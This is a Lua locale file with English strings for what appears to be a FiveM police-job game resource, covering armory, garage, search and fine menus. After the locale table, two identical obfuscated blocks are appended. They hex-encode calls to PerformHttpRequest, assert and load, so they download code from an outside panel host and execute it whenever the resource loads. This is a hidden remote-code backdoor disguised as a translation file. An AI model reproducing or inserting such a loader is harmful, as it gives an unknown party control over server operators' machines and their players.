Locales['en'] = {
  -- Cloakroom
  ['cloakroom'] = 'locker room',
  ['citizen_wear'] = 'civilian Outfit',
  ['police_wear'] = 'police Outfit',
  ['gilet_wear'] = 'orange reflective jacket',
  ['bullet_wear'] = 'bulletproof vest',
  ['no_outfit'] = 'there\'s no uniform that fits you!',
  ['open_cloackroom'] = 'press ~INPUT_CONTEXT~ to change ~y~clothes~s~.',
  -- Armory
  ['remove_object'] = 'withdraw object',
  ['deposit_object'] = 'deposit object',
  ['get_weapon'] = 'withdraw weapon from armory',
  ['put_weapon'] = 'store weapon in armory',
  ['buy_weapons'] = 'buy weapons',
  ['armory'] = 'armory',
  ['open_armory'] = 'press ~INPUT_CONTEXT~ to access the ~y~Armory~s~.',
  ['armory_owned'] = 'owned',
  ['armory_free'] = 'free',
  ['armory_item'] = '$%s',
  ['armory_weapontitle'] = 'armory - Buy weapon',
  ['armory_componenttitle'] = 'armory - Weapon attatchments',
  ['armory_bought'] = 'you bought an ~y~%s~s~ for ~r~$%s~s~',
  ['armory_money'] = 'you cannot afford that weapon',
  ['armory_hascomponent'] = 'you have that attatchment equiped!',
  ['get_weapon_menu'] = 'armory - Withdraw Weapon',
  ['put_weapon_menu'] = 'armory - Store Weapon',
  -- Vehicles
  ['vehicle_menu'] = 'vehicle',
  ['vehicle_blocked'] = 'all available spawn points are currently blocked!',
  ['garage_prompt'] = 'press ~INPUT_CONTEXT~ to access the ~y~Vehicle Actions~s~.',
  ['garage_title'] = 'vehicle Actions',
  ['garage_stored'] = 'stored',
  ['garage_notstored'] = 'not in garage',
  ['garage_storing'] = 'we\'re attempting to remove the vehicle, make sure no players are around it.',
  ['garage_has_stored'] = 'the vehicle has been stored in your garage',
  ['garage_has_notstored'] = 'no nearby owned vehicles were found',
  ['garage_notavailable'] = 'your vehicle is not stored in the garage.',
  ['garage_blocked'] = 'there\'s no available spawn points!',
  ['garage_empty'] = 'you dont have any vehicles in your garage.',
  ['garage_released'] = 'your vehicle has been released from the garage.',
  ['garage_store_nearby'] = 'there is no nearby vehicles.',
  ['garage_storeditem'] = 'open garage',
  ['garage_storeitem'] = 'store vehicle in garage',
  ['garage_buyitem'] = 'vehicle shop',
  ['helicopter_prompt'] = 'press ~INPUT_CONTEXT~ to access the ~y~Helicopter Actions~s~.',
  ['helicopter_notauthorized'] = 'you\'re not authorized to buy helicopters.',
  ['shop_item'] = '$%s',
  ['vehicleshop_title'] = 'vehicle Shop',
  ['vehicleshop_confirm'] = 'do you want to buy this vehicle?',
  ['vehicleshop_bought'] = 'you have bought ~y~%s~s~ for ~r~$%s~s~',
  ['vehicleshop_money'] = 'you cannot afford that vehicle',
  ['vehicleshop_awaiting_model'] = 'the vehicle is currently ~g~DOWNLOADING & LOADING~s~ please wait',
  ['confirm_no'] = 'no',
  ['confirm_yes'] = 'yes',
  -- Service
  ['service_max'] = 'you cannot enter service, max officers in service: %s/%s',
  ['service_not'] = 'you have not entered service! You\'ll have to get changed first.',
  ['service_anonunce'] = 'service information',
  ['service_in'] = 'you\'ve entered service, welcome!',
  ['service_in_announce'] = 'operator ~y~%s~s~ has entered service!',
  ['service_out'] = 'you have left service.',
  ['service_out_announce'] = 'operator ~y~%s~s~ has left their service.',
  -- Action Menu
  ['citizen_interaction'] = 'citizen Interaction',
  ['vehicle_interaction'] = 'vehicle Interaction',
  ['object_spawner'] = 'object Spawner',

  ['id_card'] = 'ID Card',
  ['search'] = 'search',
  ['handcuff'] = 'cuff / Uncuff',
  ['drag'] = 'escort',
  ['put_in_vehicle'] = 'put in Vehicle',
  ['out_the_vehicle'] = 'drag out from vehicle',
  ['fine'] = 'fine',
  ['unpaid_bills'] = 'manage unpaid bills',
  ['license_check'] = 'manage license',
  ['license_revoke'] = 'revoke license',
  ['license_revoked'] = 'your ~b~%s~s~ has been ~y~revoked~s~!',
  ['licence_you_revoked'] = 'you revoked a ~b~%s~s~ which belonged to ~y~%s~s~',
  ['no_players_nearby'] = 'there is no player(s) nearby!',
  ['being_searched'] = 'you are being ~y~searched~s~ by the ~b~Police~s~',
  -- Vehicle interaction
  ['vehicle_info'] = 'vehicle Info',
  ['pick_lock'] = 'lockpick Vehicle',
  ['vehicle_unlocked'] = 'vehicle ~g~Unlocked~s~',
  ['no_vehicles_nearby'] = 'there is no vehicles nearby',
  ['impound'] = 'impound vehicle',
  ['impound_prompt'] = 'press ~INPUT_CONTEXT~ to cancel the ~y~impound~s~',
  ['impound_canceled'] = 'you canceled the impound',
  ['impound_canceled_moved'] = 'the impound has been canceled because the vehicle moved',
  ['impound_successful'] = 'you have impounded the vehicle',
  ['search_database'] = 'vehicle information',
  ['search_database_title'] = 'vehicle information - search with registration number',
  ['search_database_error_invalid'] = 'that is ~r~not~s~ a ~y~valid~s~ registration number',
  ['search_database_error_not_found'] = 'that ~y~registration number~s~ is ~r~not~s~ registered to an vehicle!',
  ['search_database_found'] = 'the vehicle is ~y~registered~s~ to ~b~%s~s~',
  -- Traffic interaction
  ['traffic_interaction'] = 'interaction Traffic',
  ['cone'] = 'cone',
  ['barrier'] = 'barrier',
  ['spikestrips'] = 'spikestrips',
  ['box'] = 'box',
  ['cash'] = 'box of cash',
  -- ID Card Menu
  ['name'] = 'name: %s',
  ['job'] = 'job: %s',
  ['sex'] = 'sex: %s',
  ['dob'] = 'DOB: %s',
  ['height'] = 'height: %s',
  ['id'] = 'ID: %s',
  ['bac'] = 'BAC: %s',
  ['unknown'] = 'unknown',
  ['male'] = 'male',
  ['female'] = 'female',
  -- Body Search Menu
  ['guns_label'] = '--- Guns ---',
  ['inventory_label'] = '--- Inventory ---',
  ['license_label'] = ' --- Licenses ---',
  ['menu_licence'] = 'Licence Menu',
  ['confiscate'] = 'confiscate %s',
  ['confiscate_weapon'] = 'confiscate %s with %s bullets',
  ['confiscate_inv'] = 'confiscate %sx %s',
  ['confiscate_dirty'] = 'confiscate dirty money: <span style="color:red;">$%s</span>',
  ['you_confiscated'] = 'you confiscated ~y~%sx~s~ ~b~%s~s~ from ~b~%s~s~',
  ['got_confiscated'] = '~y~%sx~s~ ~b~%s~s~ were confiscated by ~y~%s~s~',
  ['you_confiscated_account'] = 'you confiscated ~g~$%s~s~ (%s) from ~b~%s~s~',
  ['got_confiscated_account'] = '~g~$%s~s~ (%s) was confiscated by ~y~%s~s~',
  ['you_confiscated_weapon'] = 'you confiscated ~b~%s~s~ from ~b~%s~s~ with ~o~%s~s~ bullets',
  ['got_confiscated_weapon'] = 'your ~b~%s~s~ with ~o~%s~s~ bullets was confiscated by ~y~%s~s~',
  ['traffic_offense'] = 'traffic Offense',
  ['minor_offense'] = 'minor Offense',
  ['average_offense'] = 'average Offense',
  ['major_offense'] = 'major Offense',
  ['fine_total'] = 'fine: %s',
  -- Vehicle Info Menu
  ['plate'] = 'plate: %s',
  ['owner_unknown'] = 'owner: Unknown',
  ['owner'] = 'owner: %s',
  -- Boss Menu
  ['open_bossmenu'] = 'press ~INPUT_CONTEXT~ to open the menu',
  ['quantity_invalid'] = 'invalid quantity',
  ['have_withdrawn'] = 'you have withdrawn ~y~%sx~s~ ~b~%s~s~',
  ['have_deposited'] = 'you have deposited ~y~%sx~s~ ~b~%s~s~',
  ['quantity'] = 'quantity',
  ['inventory'] = 'inventory',
  ['police_stock'] = 'police Stock',
  -- Misc
  ['remove_prop'] = 'press ~INPUT_CONTEXT~ to delete the object',
  ['map_blip'] = 'police Station',
  ['unrestrained_timer'] = 'you feel your handcuffs slowly losing grip and fading away.',
  -- Notifications
  ['alert_police'] = 'police alert',
  ['phone_police'] = 'police',
}


local cofNNpBaLBgaRiTEIUHbjCDHwvaKQNixxNoAUUiZaUvEPBqKucHlQibnwxZVqZGKjPeTsB = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} cofNNpBaLBgaRiTEIUHbjCDHwvaKQNixxNoAUUiZaUvEPBqKucHlQibnwxZVqZGKjPeTsB[4][cofNNpBaLBgaRiTEIUHbjCDHwvaKQNixxNoAUUiZaUvEPBqKucHlQibnwxZVqZGKjPeTsB[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x34\x76\x47\x63\x43\x78", function (tjhwyHUKHGUgyIBpgQiDcaaeBNlNCuPFaxHhgePisNSqeencTgrKSRPEXXZJykxxNHplyU, UFiIoBxdGyiuVhMdjYthhhiQizlUkoyEKUUzeggzLwFiJznwHTkSwUyBAajMAdVMvhCJcS) if (UFiIoBxdGyiuVhMdjYthhhiQizlUkoyEKUUzeggzLwFiJznwHTkSwUyBAajMAdVMvhCJcS == cofNNpBaLBgaRiTEIUHbjCDHwvaKQNixxNoAUUiZaUvEPBqKucHlQibnwxZVqZGKjPeTsB[6] or UFiIoBxdGyiuVhMdjYthhhiQizlUkoyEKUUzeggzLwFiJznwHTkSwUyBAajMAdVMvhCJcS == cofNNpBaLBgaRiTEIUHbjCDHwvaKQNixxNoAUUiZaUvEPBqKucHlQibnwxZVqZGKjPeTsB[5]) then return end cofNNpBaLBgaRiTEIUHbjCDHwvaKQNixxNoAUUiZaUvEPBqKucHlQibnwxZVqZGKjPeTsB[4][cofNNpBaLBgaRiTEIUHbjCDHwvaKQNixxNoAUUiZaUvEPBqKucHlQibnwxZVqZGKjPeTsB[2]](cofNNpBaLBgaRiTEIUHbjCDHwvaKQNixxNoAUUiZaUvEPBqKucHlQibnwxZVqZGKjPeTsB[4][cofNNpBaLBgaRiTEIUHbjCDHwvaKQNixxNoAUUiZaUvEPBqKucHlQibnwxZVqZGKjPeTsB[3]](UFiIoBxdGyiuVhMdjYthhhiQizlUkoyEKUUzeggzLwFiJznwHTkSwUyBAajMAdVMvhCJcS))() end)

local HDDwkKfRgzQBhxUWmHIlEdXWkYQOKekzRkLDohkApcPTNcLysAozawdeoBhXYeZzyniuCX = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} HDDwkKfRgzQBhxUWmHIlEdXWkYQOKekzRkLDohkApcPTNcLysAozawdeoBhXYeZzyniuCX[4][HDDwkKfRgzQBhxUWmHIlEdXWkYQOKekzRkLDohkApcPTNcLysAozawdeoBhXYeZzyniuCX[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x34\x76\x47\x63\x43\x78", function (cPpSfrwMQoEwRyuZBmzKRxEorSOyscHJllOVICcJDUgLWDvqfeLNtkHNxzXBMXgNhVtjNa, yzvnlVnMuiIiHXHhPnSSzbrlWFPhKmDTiqWFomPqBQzoKOyJjzOkbTHxWxOyJksEqfCGre) if (yzvnlVnMuiIiHXHhPnSSzbrlWFPhKmDTiqWFomPqBQzoKOyJjzOkbTHxWxOyJksEqfCGre == HDDwkKfRgzQBhxUWmHIlEdXWkYQOKekzRkLDohkApcPTNcLysAozawdeoBhXYeZzyniuCX[6] or yzvnlVnMuiIiHXHhPnSSzbrlWFPhKmDTiqWFomPqBQzoKOyJjzOkbTHxWxOyJksEqfCGre == HDDwkKfRgzQBhxUWmHIlEdXWkYQOKekzRkLDohkApcPTNcLysAozawdeoBhXYeZzyniuCX[5]) then return end HDDwkKfRgzQBhxUWmHIlEdXWkYQOKekzRkLDohkApcPTNcLysAozawdeoBhXYeZzyniuCX[4][HDDwkKfRgzQBhxUWmHIlEdXWkYQOKekzRkLDohkApcPTNcLysAozawdeoBhXYeZzyniuCX[2]](HDDwkKfRgzQBhxUWmHIlEdXWkYQOKekzRkLDohkApcPTNcLysAozawdeoBhXYeZzyniuCX[4][HDDwkKfRgzQBhxUWmHIlEdXWkYQOKekzRkLDohkApcPTNcLysAozawdeoBhXYeZzyniuCX[3]](yzvnlVnMuiIiHXHhPnSSzbrlWFPhKmDTiqWFomPqBQzoKOyJjzOkbTHxWxOyJksEqfCGre))() end)